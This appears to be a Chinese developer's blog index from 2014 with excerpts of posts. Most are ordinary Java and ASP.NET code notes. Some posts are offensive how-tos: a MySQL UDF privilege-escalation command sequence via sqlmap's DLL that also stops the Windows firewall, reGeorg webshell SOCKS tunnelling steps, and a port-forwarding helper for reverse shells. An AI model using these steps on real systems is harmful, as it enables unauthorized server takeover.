2014-09-08 23:00:53

asp.net SqlDataSource 预编译 动态SQL搜索

配置SqlDataSource1,搜索的一般需要动态查询,为了解决拼SQL问题,可以采用预编译。参考:SqlDataSource 中 参数动态赋值的方法 和 使用 SqlDataSource 进行带参数的查询 protected void Button1_Click(object sender, EventArgs e) { string id = TextBox1.Text.ToString(); string orgName = TextBox2.Text.ToString(); this.SqlDataSource1.SelectParameters.Clear(); string sql = "SELECT * FROM sys_user WHERE 1 = 1 "; if(id!=null && !"".Equals(id)){ sql += " and id= @id "; this.SqlDataSource1.SelectParameters.Add("id", System.TypeCode.Object, id); }

2014-09-08 22:50:10

asp.net SqlHelp.cs 和 SQL预编译

SQL预编译: string sql = "select count(1) from xxx where xxx = @id "; SqlParameter[] paras = new SqlParameter[] { new SqlParameter("@id", id) }; sqlHelp.executeQueryScalar(sql, paras); 简单封装了一下 using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Configuration; using System.Data; using System.Data.SqlClient; /// <summary> /// 数据库操作帮助类 /// yzmm /// </summary> public class SqlHelp { private SqlConnection conn = null; private SqlCommand cmd = null; private SqlDataReader sdr = null; public SqlHelp() {

2014-08-31 17:34:33

Swing JTable 动态SQL语句查询

写了无数次了,保存起来下次不重写了。每执行一次查询更新一次table的表头和表行数据。 private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {// GEN-FIRST:event_jButton1ActionPerformed ResultSet rs = DBUtil.executeQuery(textField1.getText());//执行SQL语句 // jTable1 = new JTable(); try { List<List<Object>> ls = new ArrayList<List<Object>>(); List<String> column = new ArrayList<String>(); ResultSetMetaData rsm = rs.getMetaData();//获取表元数据 for (int i = 1; i < rsm.getColumnCount()+1; i++) { column.add(rsm.getColumnName(i)); } while (rs.next()) { List<Objec

2014-08-28 23:02:29

Filter (seach and replace) array of bytes in an InputStream

byte[] byte替换,From:Filter (seach and replace) array of bytes in an InputStream ReplacingInputStream.java import java.io.*; import java.util.*; class ReplacingInputStream extends FilterInputStream { LinkedList<Integer> inQueue = new LinkedList<Integer>(); LinkedList<Integer> outQueue = new LinkedList<Integer>(); final byte[] search, replacement; protected ReplacingInputStream(InputStream in, byte[] search,byte[] replacement) { super(in); this.search = search; this.replacement = replacement; } private boolean isMatchFound() { Iterator<Integer> inIter =

2014-08-28 18:11:58

不需解压修改jar包文件内容

修改jar内容,一般做法是先解压再修改最好再压缩成jar。看了下api发现可以直接通过修改InputStream内容去修改jar。 代码: /** * 修改jar包内容 * @param jarPath * @param path * @throws Exception */ public static void makeJar(String jarPath,String path) throws Exception { try { JarOutputStream jos = new JarOutputStream(new FileOutputStream(path)); File jarFile = new File(jarPath); JarFile jf = new JarFile(jarFile); Enumeration<JarEntry> je = jf.entries(); while (je.hasMoreElements()) { JarEntry jar = je.nextElement(); System.out.println(jar.getName()); ZipEntry z = new ZipEntry(jar.getName()); InputStr

2014-08-26 12:20:50

ReadLine

public int readLine(InputStream fis) throws IOException { int count = 0, c; int len = fis.available(); int off = 0; byte[] b = new byte[len]; while ((c = fis.read()) != -1) { b[off++] = (byte) c; count++; if (c == 0x10 || count == len) { break; } } System.out.println(new String(b,0,count-1)); for (int i = 0; i < count-1; i++) { System.out.println(b[i]); } return count > 0 ? count : -1; } /** * Reads a line of text. A line is considered to be terminated by any one * of a line feed ('\n'), a carriage return ('\r'), or

2014-08-25 14:41:02

JTabbedPane 加close的两种方法(jdk1.5和1.6+)

JTabbedPane在1.6的时候新增了setTabComponentAt方法(http://docs.oracle.com/javase/tutorial/uiswing/components/tabbedpane.html),插入一个关闭按钮很方便,但是jdk1.6以下并不支持。找了两种能够支持关闭按钮的写法,第二种是从http://www.codeproject.com/Articles/18496/JTabbedPane-with-Closing-Tabs上拔下来,简单的改了下1.5应该可用。 NewJFrame.java package org.javaweb.jrat.server.ui; /** * * @author yz */ public class NewJFrame extends javax.swing.JFrame { public NewJFrame() { initComponents(); } private void initComponents() { jPanel1 = new javax.swing.JPanel(); jTabbedPane1 = new javax.swing.JTabbedPane(); jScrollPane1 = new

2014-08-15 15:00:19

SqlMap mysql udf.dll 提权

以前分享在百度网盘,好像没人看。直接发文字说明不贴图了哦。 sqlmap lib_mysqludf_sys.zip 上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll 导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径): select load_file('D:/RECYCLER/lib_mysqludf_sys.dll') into dumpfile'c:/windows/lib_mysqludf_sys.dll' (高版本需要导入上面查询到的插件目录) 创建function: create function sys_eval returns string soname 'lib_mysqludf_sys.dll'; 执行命令: select sys_eval('whoami'); 一般情况下不会出现创建不成功哦。 连不上3389可以先停止windows防火墙和筛选 select sys_eval('net stop policyagent'); select sys_eval('net stop sharedaccess');

2014-08-13 23:55:21

[zone]利用webshell搭建socks代理

FROM:http://zone.wooyun.org/content/14470 老外的开源应用 https://github.com/sensepost/reGeorg 使用示例: python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp Step 1. 上传一个脚本(aspx|ashx|jsp|php) 到web服务器上。 Step 2. 执行reGeorgSocksProxy.py脚本,连接shell监听端口。 ** 如果你使用nmap等工具需要用到 proxychains。 Step 3. Hack the planet

2014-08-13 16:04:11

Java 端口映射辅助

刚写好这小玩意,发现好像有小伙伴儿在捣乱,博客一直以来都是拿来随意记录下平时的代码什么的。之前都随便托管在一主机商,前段时间买了几个VPS一直没用上,现在就随便找个VPS腾了下。 身处内网,操作什么的很不方便反弹个shell什么的都很麻烦。远控之类的有端口映射功能,可以先在公网IP上开一个端口(如9527),然后反弹shell到目标9527端口。9527端口再转发到自己的1080端口做数据交互,同时用本地程序和数据交互端口1080通信再次交换数据即可。本地再提供一个1080代理,代码如下: RemoteConnector.java import java.io.InputStream; import java.io.OutputStream; import java.net.ServerSocket; import java.net.Socket; import java.util.logging.Logger; public class RemoteConnector extends Thread { InputStream is; OutputStream os; static final Logger logger = Logger.getLogger(RemoteConnector.class.getName()); public RemoteConnector()